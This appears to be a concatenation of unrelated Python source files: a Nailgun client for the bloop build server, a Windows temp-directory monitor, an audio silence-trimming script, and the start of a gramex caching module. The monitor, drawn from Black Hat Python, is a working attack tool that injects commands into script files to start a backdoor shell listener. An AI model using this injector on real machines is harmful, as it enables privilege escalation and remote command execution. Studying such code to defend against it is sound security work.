# after the method (ReadFile) returns
buf = ctypes.create_string_buffer(nbytes)
olap = OVERLAPPED()
olap.hEvent = self.read_waitable
immediate = ReadFile(self.pipe, buf, nbytes, None, olap)
if not immediate:
err = GetLastError()
if err != ERROR_IO_PENDING:
self._raise_win_err("failed to read %d bytes" % nbytes, GetLastError())
nread = wintypes.DWORD()
if not GetOverlappedResult(self.pipe, olap, nread, True):
err = GetLastError()
self._raise_win_err("error while waiting for read", err)
nread = nread.value
buffer[:nread] = buf[:nread]
return nread
def sendall(self, data):
olap = OVERLAPPED()
olap.hEvent = self.write_waitable
p = (ctypes.c_ubyte * len(data))(*(bytearray(data)))
immediate = WriteFile(self.pipe, p, len(data), None, olap)
if not immediate:
err = GetLastError()
if err != ERROR_IO_PENDING:
self._raise_win_err(
"failed to write %d bytes" % len(data), GetLastError()
)
# Obtain results, waiting if needed
nwrote = wintypes.DWORD()
if not GetOverlappedResult(self.pipe, olap, nwrote, True):
err = GetLastError()
self._raise_win_err("error while waiting for write", err)
nwrote = nwrote.value
if nwrote != len(data):
raise IOError("Async wrote less bytes!")
return nwrote
def select(self, timeout_secs):
start = monotonic_time_nanos()
timeout_nanos = timeout_secs * NSEC_PER_SEC
while True:
readable, exceptional = self.select_now()
if (
readable
or exceptional
or monotonic_time_nanos() - start > timeout_nanos
):
return readable, exceptional
def select_now(self):
available_total = wintypes.DWORD()
exceptional = not PeekNamedPipe(self.pipe, None, 0, None, available_total, None)
readable = available_total.value > 0
result = readable, exceptional
return result
class NailgunConnection(object):
"""Stateful object holding the connection to the Nailgun server."""
def __init__(
self,
server_name,
server_port=None,
stdin=sys.stdin,
stdout=sys.stdout,
stderr=sys.stderr,
cwd=None,
heartbeat_interval_sec=DEFAULT_HEARTBEAT_INTERVAL_SEC,
):
self.transport = make_nailgun_transport(server_name, server_port, cwd)
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
self.recv_flags = 0
self.send_flags = 0
self.header_buf = ctypes.create_string_buffer(CHUNK_HEADER_LEN)
self.buf = ctypes.create_string_buffer(BUFSIZE)
self.exit_code = None
self.shutdown_event = Event()
self.error_lock = RLock()
self.error = None
self.error_traceback = None
self.stdin_condition = Condition()
self.stdin_thread = Thread(target=stdin_thread_main, args=(self,))
self.stdin_thread.daemon = True
self.send_queue = Queue.Queue()
self.send_condition = Condition()
self.send_thread = Thread(target=send_thread_main, args=(self,))
self.send_thread.daemon = True
self.heartbeat_interval_sec = heartbeat_interval_sec
self.heartbeat_condition = Condition()
self.heartbeat_thread = None
if heartbeat_interval_sec > 0:
self.heartbeat_thread = Thread(target=heartbeat_thread_main, args=(self,))
self.heartbeat_thread.daemon = True
def send_command(
self, cmd, cmd_args=[], filearg=None, env=os.environ, cwd=os.getcwd()
):
"""
Sends the command and environment to the nailgun server, then loops forever
reading the response until the server sends an exit chunk.
Returns the exit value, or raises NailgunException on error.
"""
try:
return self._send_command_and_read_response(
cmd, cmd_args, filearg, env, cwd
)
except socket.error as e:
re_raise(
NailgunException(
"Server disconnected unexpectedly: {0}".format(e),
NailgunException.CONNECTION_BROKEN,
)
)
def _send_command_and_read_response(self, cmd, cmd_args, filearg, env, cwd):
self.stdin_thread.start()
self.send_thread.start()
try:
if filearg:
self._send_file_arg(filearg)
for cmd_arg in cmd_args:
self._send_chunk(cmd_arg, CHUNKTYPE_ARG)
self._send_env_var("NAILGUN_FILESEPARATOR", os.sep)
self._send_env_var("NAILGUN_PATHSEPARATOR", os.pathsep)
self._send_tty_format(self.stdin)
self._send_tty_format(self.stdout)
self._send_tty_format(self.stderr)
for k, v in env.items():
self._send_env_var(k, v)
self._send_chunk(cwd, CHUNKTYPE_DIR)
self._send_chunk(cmd, CHUNKTYPE_CMD)
if self.heartbeat_thread is not None:
self.heartbeat_thread.start()
while self.exit_code is None:
self._process_next_chunk()
finally:
self.shutdown_event.set()
with self.stdin_condition:
self.stdin_condition.notify()
with self.send_condition:
self.send_condition.notify()
if self.heartbeat_thread is not None:
with self.heartbeat_condition:
self.heartbeat_condition.notify()
self.heartbeat_thread.join(THREAD_TERMINATION_TIMEOUT_SEC)
self.stdin_thread.join(THREAD_TERMINATION_TIMEOUT_SEC)
self.send_thread.join(THREAD_TERMINATION_TIMEOUT_SEC)
return self.exit_code
def _process_next_chunk(self):
"""
Processes the next chunk from the nailgun server.
"""
readable, exceptional = self.transport.select(SELECT_MAX_BLOCK_TIME_SEC)
if readable:
self._process_nailgun_stream()
if exceptional:
raise NailgunException(
"Server disconnected in select", NailgunException.CONNECTION_BROKEN
)
# if daemon thread threw, rethrow here
if self.shutdown_event.is_set():
e = None
e_tb = None
with self.error_lock:
e = self.error
e_tb = self.error_traceback
if e is not None:
re_raise(e, e_tb)
def _send_chunk(self, buf, chunk_type):
"""
Send chunk to the server asynchronously
"""
self.send_queue.put((chunk_type, buf))
with self.send_condition:
self.send_condition.notify()
def _send_env_var(self, name, value):
"""
Sends an environment variable in KEY=VALUE format.
"""
self._send_chunk("=".join((name, value)), CHUNKTYPE_ENV)
def _send_tty_format(self, f):
"""
Sends a NAILGUN_TTY_# environment variable.
"""
if not f or not hasattr(f, "fileno"):
return
try:
fileno = f.fileno()
isatty = os.isatty(fileno)
self._send_env_var("NAILGUN_TTY_" + str(fileno), str(int(isatty)))
except UnsupportedOperation:
return
def _send_file_arg(self, filename):
"""
Sends the contents of a file to the server.
"""
        with open(filename, "rb") as f:  # binary mode so readinto() also works on Python 3
while True:
num_bytes = f.readinto(self.buf)
if not num_bytes:
break
self._send_chunk(self.buf.raw[:num_bytes], CHUNKTYPE_LONGARG)
def _recv_to_fd(self, dest_file, num_bytes):
"""
Receives num_bytes bytes from the nailgun socket and copies them to the specified file
object. Used to route data to stdout or stderr on the client.
"""
bytes_read = 0
while bytes_read < num_bytes:
bytes_to_read = min(len(self.buf), num_bytes - bytes_read)
bytes_received = self.transport.recv_into(self.buf, bytes_to_read)
if dest_file:
dest_file.write(bytes_to_str(self.buf[:bytes_received]))
dest_file.flush()
bytes_read += bytes_received
def _recv_to_buffer(self, num_bytes, buf):
"""
Receives num_bytes from the nailgun socket and writes them into the specified buffer.
"""
# We'd love to use socket.recv_into() everywhere to avoid
# unnecessary copies, but we need to support Python 2.6. The
# only way to provide an offset to recv_into() is to use
# memoryview(), which doesn't exist until Python 2.7.
if HAS_MEMORYVIEW:
self._recv_into_memoryview(num_bytes, memoryview(buf))
else:
self._recv_to_buffer_with_copy(num_bytes, buf)
def _recv_into_memoryview(self, num_bytes, buf_view):
"""
Receives num_bytes from the nailgun socket and writes them into the specified memoryview
to avoid an extra copy.
"""
bytes_read = 0
while bytes_read < num_bytes:
bytes_received = self.transport.recv_into(
buf_view[bytes_read:], num_bytes - bytes_read
)
if not bytes_received:
raise NailgunException(
"Server unexpectedly disconnected in recv_into()",
NailgunException.CONNECTION_BROKEN,
)
bytes_read += bytes_received
def _recv_to_buffer_with_copy(self, num_bytes, buf):
"""
Receives num_bytes from the nailgun socket and writes them into the specified buffer.
"""
bytes_read = 0
while bytes_read < num_bytes:
recv_buf = self.transport.recv(num_bytes - bytes_read)
if not len(recv_buf):
raise NailgunException(
"Server unexpectedly disconnected in recv()",
NailgunException.CONNECTION_BROKEN,
)
buf[bytes_read : bytes_read + len(recv_buf)] = recv_buf
bytes_read += len(recv_buf)
def _process_exit(self, exit_len):
"""
Receives an exit code from the nailgun server and sets nailgun_connection.exit_code
to indicate the client should exit.
"""
num_bytes = min(len(self.buf), exit_len)
self._recv_to_buffer(num_bytes, self.buf)
self.exit_code = int(self.buf.raw[:num_bytes])
def _send_heartbeat(self):
"""
Sends a heartbeat to the nailgun server to indicate the client is still alive.
"""
self._send_chunk("", CHUNKTYPE_HEARTBEAT)
def _process_nailgun_stream(self):
"""
Processes a single chunk from the nailgun server.
"""
self._recv_to_buffer(len(self.header_buf), self.header_buf)
(chunk_len, chunk_type) = struct.unpack_from(">ic", self.header_buf.raw)
if chunk_type == CHUNKTYPE_STDOUT:
self._recv_to_fd(self.stdout, chunk_len)
elif chunk_type == CHUNKTYPE_STDERR:
self._recv_to_fd(self.stderr, chunk_len)
elif chunk_type == CHUNKTYPE_EXIT:
self._process_exit(chunk_len)
elif chunk_type == CHUNKTYPE_SENDINPUT:
# signal stdin thread to get and send more data
with self.stdin_condition:
self.stdin_condition.notify()
else:
raise NailgunException(
"Unexpected chunk type: {0}".format(chunk_type),
NailgunException.UNEXPECTED_CHUNKTYPE,
)
def wait_termination(self, timeout):
"""
Wait for shutdown event to be signalled within specified interval
Return True if termination was signalled, False otherwise
"""
wait_time = timeout
start = monotonic_time_nanos()
with self.send_condition:
while True:
if self.shutdown_event.is_set():
return True
self.send_condition.wait(wait_time)
elapsed = (monotonic_time_nanos() - start) * 1.0 / NSEC_PER_SEC
wait_time = timeout - elapsed
if wait_time <= 0:
return False
return False
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
try:
self.transport.close()
except socket.error:
pass
def monotonic_time_nanos():
"""Returns a monotonically-increasing timestamp value in nanoseconds.
The epoch of the return value is undefined. To use this, you must call
it more than once and calculate the delta between two calls.
"""
# This function should be overwritten below on supported platforms.
raise Exception("Unsupported platform: " + platform.system())
if platform.system() == "Linux":
# From <linux/time.h>, available since 2.6.28 (released 24-Dec-2008).
CLOCK_MONOTONIC_RAW = 4
librt = ctypes.CDLL("librt.so.1", use_errno=True)
clock_gettime = librt.clock_gettime
class struct_timespec(ctypes.Structure):
_fields_ = [("tv_sec", ctypes.c_long), ("tv_nsec", ctypes.c_long)]
clock_gettime.argtypes = [ctypes.c_int, ctypes.POINTER(struct_timespec)]
def _monotonic_time_nanos_linux():
t = struct_timespec()
clock_gettime(CLOCK_MONOTONIC_RAW, ctypes.byref(t))
return t.tv_sec * NSEC_PER_SEC + t.tv_nsec
monotonic_time_nanos = _monotonic_time_nanos_linux
elif platform.system() == "Darwin":
# From <mach/mach_time.h>
KERN_SUCCESS = 0
libSystem = ctypes.CDLL("/usr/lib/libSystem.dylib", use_errno=True)
mach_timebase_info = libSystem.mach_timebase_info
class struct_mach_timebase_info(ctypes.Structure):
_fields_ = [("numer", ctypes.c_uint32), ("denom", ctypes.c_uint32)]
mach_timebase_info.argtypes = [ctypes.POINTER(struct_mach_timebase_info)]
mach_ti = struct_mach_timebase_info()
ret = mach_timebase_info(ctypes.byref(mach_ti))
if ret != KERN_SUCCESS:
raise Exception("Could not get mach_timebase_info, error: " + str(ret))
mach_absolute_time = libSystem.mach_absolute_time
mach_absolute_time.restype = ctypes.c_uint64
def _monotonic_time_nanos_darwin():
return (mach_absolute_time() * mach_ti.numer) / mach_ti.denom
monotonic_time_nanos = _monotonic_time_nanos_darwin
elif platform.system() == "Windows":
# From <Winbase.h>
perf_frequency = ctypes.c_uint64()
ctypes.windll.kernel32.QueryPerformanceFrequency(ctypes.byref(perf_frequency))
def _monotonic_time_nanos_windows():
perf_counter = ctypes.c_uint64()
ctypes.windll.kernel32.QueryPerformanceCounter(ctypes.byref(perf_counter))
return perf_counter.value * NSEC_PER_SEC / perf_frequency.value
monotonic_time_nanos = _monotonic_time_nanos_windows
elif sys.platform == "cygwin":
try:
k32 = ctypes.CDLL("Kernel32", use_errno=True)
except OSError:
k32 = ctypes.CDLL("Kernel32.dll", use_errno=True)
perf_frequency = ctypes.c_uint64()
k32.QueryPerformanceFrequency(ctypes.byref(perf_frequency))
def _monotonic_time_nanos_cygwin():
perf_counter = ctypes.c_uint64()
k32.QueryPerformanceCounter(ctypes.byref(perf_counter))
return perf_counter.value * NSEC_PER_SEC / perf_frequency.value
monotonic_time_nanos = _monotonic_time_nanos_cygwin
def send_thread_main(conn):
"""
Sending thread worker function
Waits for data and transmits it to server
"""
try:
header_buf = ctypes.create_string_buffer(CHUNK_HEADER_LEN)
while True:
connection_error = None
while not conn.send_queue.empty():
# only this thread can deplete the queue, so it is safe to use blocking get()
(chunk_type, buf) = conn.send_queue.get()
bbuf = to_bytes(buf)
                byte_count = len(bbuf)
struct.pack_into(">ic", header_buf, 0, byte_count, chunk_type)
                # the server is not required to accept and process these chunk types, and it may
                # terminate at any time without waiting for them
is_required = chunk_type not in (
CHUNKTYPE_HEARTBEAT,
CHUNKTYPE_STDIN,
CHUNKTYPE_STDIN_EOF,
)
try:
conn.transport.sendall(header_buf.raw)
conn.transport.sendall(bbuf)
except socket.error as e:
                    # The server may send a termination signal and close the socket immediately; writing
                    # to such a socket (e.g. a heartbeat) then fails with an error (SIGPIPE).
                    # The Nailgun protocol is not duplex, so the server does not wait for the client to acknowledge;
                    # we catch the exception and ignore it if termination happened shortly afterwards
if not is_required and conn.wait_termination(
SEND_THREAD_WAIT_TERMINATION_SEC
):
return
raise
with conn.send_condition:
if conn.shutdown_event.is_set():
return
if not conn.send_queue.empty():
continue
conn.send_condition.wait()
if conn.shutdown_event.is_set():
return
except Exception as e:
# save exception to rethrow on main thread
with conn.error_lock:
conn.error = e
conn.error_traceback = sys.exc_info()[2]
conn.shutdown_event.set()
def stdin_thread_main(conn):
"""
Stdin thread reading worker function
If stdin is available, read it to internal buffer and send to server
"""
try:
eof = False
while True:
# wait for signal to read new line from stdin or shutdown
# we do not start reading from stdin before server actually requests that
with conn.stdin_condition:
if conn.shutdown_event.is_set():
return
conn.stdin_condition.wait()
if conn.shutdown_event.is_set():
return
            if not conn.stdin or eof:
                # nothing (more) to read; send an EOF chunk with an empty payload, since
                # 'buf' is not defined before the first successful readline()
                conn._send_chunk("", CHUNKTYPE_STDIN_EOF)
                continue
buf = conn.stdin.readline()
if buf == "":
eof = True
conn._send_chunk(buf, CHUNKTYPE_STDIN_EOF)
continue
conn._send_chunk(buf, CHUNKTYPE_STDIN)
except Exception as e:
# save exception to rethrow on main thread
with conn.error_lock:
conn.error = e
conn.error_traceback = sys.exc_info()[2]
conn.shutdown_event.set()
def heartbeat_thread_main(conn):
"""
Heartbeat thread worker function
Periodically sends heartbeats to server as long as command is running
"""
try:
while True:
with conn.heartbeat_condition:
if conn.shutdown_event.is_set():
return
conn.heartbeat_condition.wait(conn.heartbeat_interval_sec)
if conn.shutdown_event.is_set():
return
conn._send_heartbeat()
except Exception as e:
# save exception to rethrow on main thread
with conn.error_lock:
conn.error = e
conn.error_traceback = sys.exc_info()[2]
conn.shutdown_event.set()
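# Illustrative sketch (assumption: the real NailgunConnection._send_chunk is defined elsewhere
# in this file): the producer side matching send_thread_main above would enqueue a
# (chunk_type, payload) tuple and wake the send thread through send_condition.
def _example_enqueue_chunk(conn, payload, chunk_type):
    conn.send_queue.put((chunk_type, payload))  # consumed by send_thread_main
    with conn.send_condition:
        conn.send_condition.notify()  # wake the sending thread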
def make_nailgun_transport(nailgun_server, nailgun_port=None, cwd=None):
"""
Creates and returns a socket connection to the nailgun server.
"""
transport = None
if nailgun_server.startswith("local:"):
if platform.system() == "Windows":
pipe_addr = nailgun_server[6:]
transport = WindowsNamedPipeTransport(pipe_addr)
else:
try:
s = socket.socket(socket.AF_UNIX)
except socket.error as msg:
re_raise(
NailgunException(
"Could not create local socket connection to server: {0}".format(
msg
),
NailgunException.SOCKET_FAILED,
)
)
socket_addr = nailgun_server[6:]
prev_cwd = os.getcwd()
try:
if cwd is not None:
os.chdir(cwd)
s.connect(socket_addr)
transport = UnixTransport(s)
except socket.error as msg:
re_raise(
NailgunException(
"Could not connect to local server at {0}: {1}".format(
socket_addr, msg
),
NailgunException.CONNECT_FAILED,
)
)
finally:
if cwd is not None:
os.chdir(prev_cwd)
else:
socket_addr = nailgun_server
socket_family = socket.AF_UNSPEC
for (af, socktype, proto, _, sa) in socket.getaddrinfo(
nailgun_server, nailgun_port, socket.AF_UNSPEC, socket.SOCK_STREAM
):
try:
s = socket.socket(af, socktype, proto)
except socket.error as msg:
s = None
continue
try:
s.connect(sa)
transport = UnixTransport(s)
except socket.error as msg:
s.close()
s = None
continue
break
if transport is None:
raise NailgunException(
"Could not connect to server {0}:{1}".format(nailgun_server, nailgun_port),
NailgunException.CONNECT_FAILED,
)
return transport
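# Illustrative sketch (hypothetical addresses): make_nailgun_transport accepts either a host
# name for a TCP connection or a "local:" prefixed unix-domain socket / named-pipe address.
def _example_make_transport():
    tcp = make_nailgun_transport("127.0.0.1", int(NAILGUN_PORT_DEFAULT))
    local = make_nailgun_transport("local:/tmp/bloop.sock")  # hypothetical socket path
    return tcp, local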
if is_py2:
exec(
'''
def re_raise(ex, ex_trace = None):
"""
Throw ex and preserve stack trace of original exception if we run on Python 2
"""
if ex_trace is None:
ex_trace = sys.exc_info()[2]
raise ex, None, ex_trace
'''
)
else:
def re_raise(ex, ex_trace=None):
"""
        Re-raise ex; on Python 3 the original traceback is already attached to the exception
"""
raise ex
def main():
"""
Main entry point to the nailgun client.
"""
default_nailgun_server = os.environ.get("NAILGUN_SERVER", "127.0.0.1")
default_nailgun_port = int(os.environ.get("NAILGUN_PORT", NAILGUN_PORT_DEFAULT))
parser = optparse.OptionParser(add_help_option=False, usage="%prog [options] cmd arg1 arg2 ...")
parser.disable_interspersed_args()
parser.add_option("--nailgun-server", default=default_nailgun_server)
parser.add_option("--nailgun-port", type="int", default=default_nailgun_port)
parser.add_option("--nailgun-filearg")
parser.add_option("--nailgun-showversion", action="store_true")
parser.add_option("--nailgun-help", action="help")
parser.add_option('-h', '--help', action='store_true', dest='help_set')
parser.add_option('--server-location', type='string', dest='server_location')
(options, args) = parser.parse_args()
if options.nailgun_showversion:
print("NailGun client version " + NAILGUN_VERSION)
if len(args):
cmd = args.pop(0)
else:
cmd = os.path.basename(sys.argv[0])
if options.help_set and not args:
cmd = "help"
cmd_args = []
else:
# Pass any remaining command line arguments to the server.
cmd_args = args
# The command we need to execute gets written
# to the --out-file parameter. If the user
# hasn't specified this we hijack it
out_file_temp = tempfile.NamedTemporaryFile()
out_file_path = out_file_temp.name
if cmd == "console":
try:
index = cmd_args.index("--out-file")
        except ValueError:
index = -1
if index != -1:
out_file_path = cmd_args[index + 1]
        else:
cmd_args = cmd_args + ["--out-file", out_file_path]
if cmd == "server":
nailgun_port = options.nailgun_port
try:
# Pick user-defined nailgun port after `server`
for arg in cmd_args:
if not arg.startswith("-"):
try:
nailgun_port = int(arg)
break
except ValueError:
print("Argument after `bloop server` is not a port " + str(arg) + ".")
if nailgun_port == options.nailgun_port:
print("Defaulting on nailgun port " + str(nailgun_port))
with NailgunConnection(
options.nailgun_server, server_port=nailgun_port
) as c:
print("Check if server is alive or not...")
exit_code = c.send_command("about", filearg=options.nailgun_filearg)
print("-------------------------------------------------------------------")
print("A bloop server is already running in port " + str(nailgun_port) + ".")
print("")
print(" - Do you want to spawn a bloop server in another port?")
print(" Run `bloop server $NAILGUN_PORT`.")
print(" - Do you want to kill the running server?")
print(" Run `bloop ng-stop --nailgun-port $NAILGUN_PORT` or `bloop ng-stop` for short.")
print("")
print("Questions? Reach us at https://gitter.im/scalacenter/bloop")
sys.exit(exit_code)
except NailgunException as e:
print("There is no server running at port " + str(nailgun_port))
print("Starting the bloop server... this may take a few seconds")
basedir = os.path.dirname(os.path.realpath(os.path.abspath(sys.argv[0])))
server_location = os.path.join(basedir, "blp-server")
if not os.path.isfile(server_location):
if options.server_location:
server_location = options.server_location
else:
print("Bloop server could not be located in %s." % server_location)
print("Pass in the location with `--server-location` before the `server` command.")
sys.exit(1)
# Read jvm options from the .jvmopts file
jvmopts_file = os.path.join(basedir, ".jvmopts")
jvm_options_from_file = []
if os.path.isfile(jvmopts_file):
with open(jvmopts_file, "r") as jvmopts:
lines = jvmopts.read().splitlines()
for line in lines:
if line.startswith("-J"):
jvm_options_from_file.append(line)
else:
jvm_options_from_file.append("-J" + line)
try:
jvm_options_no_prefix = []
server_args = []
for jvm_arg in jvm_options_from_file:
if jvm_arg.startswith("-J"):
# Remove prefix -J from argument
jvm_options_no_prefix.append(jvm_arg[2:])
for arg in cmd_args:
if arg.startswith("-J"):
# Remove prefix -J from argument
jvm_options_no_prefix.append(arg[2:])
else:
server_args.append(arg)
# Works in Windows and installations that have a jar instead of a script
start = int(round(time.time() * 1000))
print("Running " + server_location + " as a jar...")
java_cmd = ["java"] + jvm_options_no_prefix + ["-jar", server_location] + server_args
print("Shelling out with '" + str(java_cmd) + "' ...")
check_call(java_cmd)
except CalledProcessError as e:
                # Works in systems such as Mac OS or Nix in which blp-server is a script
end = int(round(time.time() * 1000))
                diff = end - start
if diff > 15000:
print("Skipping second attempt, previous command invocation took longer than 15s")
else:
try:
jvm_options_with_prefix = [ "-J" + opt for opt in jvm_options_no_prefix ]
print("Running " + server_location + " as a script...")
if platform.system() == "Windows":
cmd = ["cmd.exe", "/C", server_location] + cmd_args + jvm_options_with_prefix
print("Shelling out in Windows with " + str(cmd))
check_call(cmd)
else:
cmd = ["sh", server_location] + cmd_args + jvm_options_with_prefix
print("Shelling out in Unix system with " + str(cmd))
check_call(cmd)
except CalledProcessError as e2:
print("Bloop server in %s failed to run." % server_location)
print("First invocation attempt: %s" % e.cmd)
print("-> Return code: %d" % e.returncode)
print("Second invocation attempt: %s" % e2.cmd)
print("-> Return code: %d" % e2.returncode)
# Only use the return code of the first attempt
sys.exit(e.returncode)
except KeyboardInterrupt as e:
sys.exit(0)
try:
with NailgunConnection(
options.nailgun_server, server_port=options.nailgun_port
) as c:
if cmd == "repl":
sys.stderr.write("Did you mean `bloop console`?\n")
sys.exit(1)
exit_code = c.send_command(cmd, cmd_args, options.nailgun_filearg)
if cmd == "help":
sys.stdout.write("Type `--nailgun-help` for help on the Nailgun CLI tool.\n")
# the user might have specified a REPL to use
# we fallback to ammonite as the default one
# if none is specified
try:
repl_kind_index = cmd_args.index("--repl") + 1
repl_kind = cmd_args[repl_kind_index]
            except (ValueError, IndexError):
repl_kind = "ammonite"
if cmd == "console" and repl_kind == "ammonite" and exit_code == 0:
with open(out_file_path, 'r') as f:
try:
repl_cmd = f.read().split(" ")
basedir = os.path.dirname(os.path.realpath(os.path.abspath(sys.argv[0])))
coursier_location = os.path.join(basedir, "blp-coursier")
if (os.path.isfile(coursier_location)):
repl_cmd[0] = coursier_location
if platform.system() == "Windows":
cmd = ["cmd.exe", "/C"] + repl_cmd
# print("Running console in Windows with " + " ".join(cmd))
check_call(cmd)
else:
cmd = ["sh"] + repl_cmd
# print("Running console in Unix system with " + " ".join(cmd))
check_call(cmd)
except CalledProcessError as e:
print("Bloop console failed to run!")
print("-> Command: %s" % e.cmd)
print("-> Return code: %d" % e.returncode)
sys.exit(exit_code)
except NailgunException as e:
sys.stderr.write(str(e))
if "Could not connect to" in str(e):
sys.stderr.write("\n\n")
sys.stderr.write("Have you forgotten to start bloop's server? Run it with `bloop server`.\n")
sys.stderr.write("Check our usage instructions in https://scalacenter.github.io/bloop/\n")
if cmd == "help":
sys.stdout.write("Type `--nailgun-help` for help on the Nailgun CLI tool.\n")
sys.exit(e.code)
except KeyboardInterrupt as e:
pass
if __name__ == "__main__":
main()
|
f_monitor.py
|
'''
Tested on python3
About : File Monitor
pre-req : pywin32 (http://sourceforge.net/projects/pywin32/)
reference : http://www.nostarch.com/blackhatpython/
'''
import tempfile
import threading
import win32file
import win32con
import os
#tmp file directory
monitor_temp_dir = ["C:\\WINDOWS\\Temp",tempfile.gettempdir()]
#constants
FILE_CREATED = 1
FILE_DELETED = 2
FILE_MODIFIED = 3
FILE_RENAMED_FROM = 4
FILE_RENAMED_TO = 5
types_of_files = {}
command = "C:\\WINDOWS\\TEMP\\bhpnet.exe -l -p 9999 -c"
types_of_files['.vbs'] = ["\r\n'bhpmarker\r\n","\r\nCreateObject(\"Wscript.Shell\").Run(\"%s\")\r\n" % command]
types_of_files['.bat'] = ["\r\nREM bhpmarker\r\n","\r\n%s\r\n" % command]
types_of_files['.ps1'] = ["\r\n#bhpmarker","Start-Process \"%s\"\r\n" % command]
def inject_code(full_filename,extension,contents):
#check if marker is ready
if types_of_files[extension][0] in contents:
return
#if no marker
full_contents = types_of_files[extension][0]
full_contents += types_of_files[extension][1]
full_contents += contents
with open(full_filename,"wb") as fd:
fd.write(full_contents)
print("[\o/] Injected code.")
return
def start_monitor(path_to_watch):
#thread
FILE_LIST_DIRECTORY = 0x0001
h_directory = win32file.CreateFile(
path_to_watch,
FILE_LIST_DIRECTORY,
win32con.FILE_SHARE_READ | win32con.FILE_SHARE_WRITE | win32con.FILE_SHARE_DELETE,
None,
win32con.OPEN_EXISTING,
win32con.FILE_FLAG_BACKUP_SEMANTICS,
None
)
while True:
try:
results = win32file.ReadDirectoryChangesW(
h_directory,
1024,
True,
win32con.FILE_NOTIFY_CHANGE_FILE_NAME |
win32con.FILE_NOTIFY_CHANGE_DIR_NAME |
win32con.FILE_NOTIFY_CHANGE_ATTRIBUTES |
win32con.FILE_NOTIFY_CHANGE_SIZE |
win32con.FILE_NOTIFY_CHANGE_LAST_WRITE |
win32con.FILE_NOTIFY_CHANGE_SECURITY,
None,
None
)
for action,file_name in results:
full_filename = os.path.join(path_to_watch, file_name)
if action == FILE_CREATED:
print("Created %s" % full_filename)
elif action == FILE_DELETED:
print("Deleted %s" % full_filename)
elif action == FILE_MODIFIED:
print("Modified %s" % full_filename)
print("Dumping contents...")
try:
with open(full_filename,"rb") as fd:
contents = fd.read()
print(contents)
                            print("Dump complete.")
except Exception as e:
print("Failed.")
print(e)
filename,extension = os.path.splitext(full_filename)
if extension in types_of_files:
inject_code(full_filename,extension,contents)
                elif action == FILE_RENAMED_FROM:
print("Renamed from: %s" % full_filename)
elif action == FILE_RENAMED_TO:
print("Renamed to: %s" % full_filename)
else:
print("Unknown: %s" % full_filename)
except Exception as e:
print(e)
for path in monitor_temp_dir:
monitor_thread = threading.Thread(target=start_monitor,args=(path,))
print("Spawning monitoring thread for path: %s" % path)
monitor_thread.start()
#Reference: http://timgolden.me.uk/python/win32_how_do_i/watch_directory_for_changes.html
|
remove_silence.py
|
import librosa
import tensorflow as tf
from tqdm import tqdm
from glob import glob
from threading import Thread
FLAGS = tf.compat.v1.flags.FLAGS
def remove_silence(file, bar):
y, sr = librosa.load(file)
yt, index = librosa.effects.trim(y, top_db=10)
librosa.output.write_wav(file, yt, sr)
bar.update(1)
def main(_):
data_dir = FLAGS.data_dir
files = glob(data_dir + "/*.wav")
threads = []
with tqdm(total=len(files)) as bar:
for file in files:
thread = Thread(target=remove_silence, args=(file, bar,))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
if __name__ == '__main__':
tf.compat.v1.flags.DEFINE_string("data_dir", "data dir", "data directory")
tf.compat.v1.app.run()
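# Example invocation (illustrative):
#   python remove_silence.py --data_dir ./wavs
# Each .wav file in --data_dir is trimmed in place. Note that librosa.output.write_wav only
# exists in librosa versions before 0.8; later releases write audio via the soundfile package.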
|
cache.py
|
'''Caching utilities'''
import io
import os
import re
import six
import sys
import json
import time
import atexit
import inspect
import requests
import tempfile
import mimetypes
import subprocess # nosec
import pandas as pd
import tornado.template
from lxml import etree
from threading import Thread
from six.moves.queue import Queue
from orderedattrdict import AttrDict
from tornado.concurrent import Future
from tornado.ioloop import IOLoop, PeriodicCallback
from gramex.config import app_log, merge, used_kwargs, CustomJSONDecoder, CustomJSONEncoder
from gramex.config import PathConfig
from six.moves.urllib_parse import urlparse
_undef = object()
MILLISECOND = 0.001 # in seconds
_opener_defaults = dict(mode='r', buffering=-1, encoding='utf-8', errors='strict',
newline=None, closefd=True)
_markdown_defaults = dict(output_format='html5', extensions=[
'markdown.extensions.codehilite',
'markdown.extensions.extra',
'markdown.extensions.toc',
'markdown.extensions.meta',
'markdown.extensions.sane_lists',
'markdown.extensions.smarty',
])
# A set of temporary files to delete on program exit
_TEMP_FILES = set()
_ID_CACHE = set()
def _delete_temp_files():
for path in _TEMP_FILES:
if os.path.exists(path):
os.remove(path)
atexit.register(_delete_temp_files)
def hashfn(fn):
'''Returns a unique hash value for the function.'''
# id() returns a unique value for the lifetime of an object.
# To ensure that ID is not re-cycled, cache object, so it's never released.
_ID_CACHE.add(fn)
return id(fn)
def cache_key(*args):
'''Converts arguments into a string suitable for use as a cache key'''
return json.dumps(args, sort_keys=True, separators=(',', ':'))
def opener(callback, read=False, **open_kwargs):
'''
    Converts any function that accepts a string or handle as its parameter into
    a function that takes a file path as its first parameter.
Here are a few examples::
jsonload = opener(json.load)
jsonload('x.json') # opens x.json and runs json.load(handle)
gramex.cache.open('x.json', jsonload) # Loads x.json, cached
# read=True parameter passes the contents (not handle) to the function
template = opener(string.Template, read=True)
template('abc.txt').substitute(x=val)
gramex.cache.open('abc.txt', template).substitute(x=val)
# If read=True, callback may be None. The result of .read() is passed as-is
text = opener(None, read=True)
gramex.cache.open('abc.txt', text)
Keyword arguments applicable for ``io.open`` are passed to ``io.open``. These
default to ``io.open(mode='r', buffering=-1, encoding='utf-8',
errors='strict', newline=None, closefd=True)``. All other arguments and
keyword arguments are passed to the callback (e.g. to ``json.load``).
When reading binary files, pass ``mode='rb', encoding=None, errors=None``.
'''
merge(open_kwargs, _opener_defaults, 'setdefault')
if read:
# Pass contents to callback
def method(path, **kwargs):
open_args = {key: kwargs.pop(key, val) for key, val in open_kwargs.items()}
with io.open(path, **open_args) as handle:
result = handle.read()
return callback(result, **kwargs) if callable(callback) else result
else:
if not callable(callback):
            raise ValueError('opener callback %s not a function' % repr(callback))
# Pass handle to callback
def method(path, **kwargs):
open_args = {key: kwargs.pop(key, val) for key, val in open_kwargs.items()}
with io.open(path, **open_args) as handle:
return callback(handle, **kwargs)
return method
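# Illustrative sketch (hypothetical file name): opener() turns a content- or handle-consuming
# callable into a path-consuming one, e.g. a simple line counter.
def _example_opener_usage():
    count_lines = opener(lambda text: len(text.splitlines()), read=True)
    # count_lines('notes.txt') opens notes.txt with the io.open defaults above and returns its
    # line count; the same callable can be passed to gramex.cache.open for cached re-use.
    return count_lines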
@opener
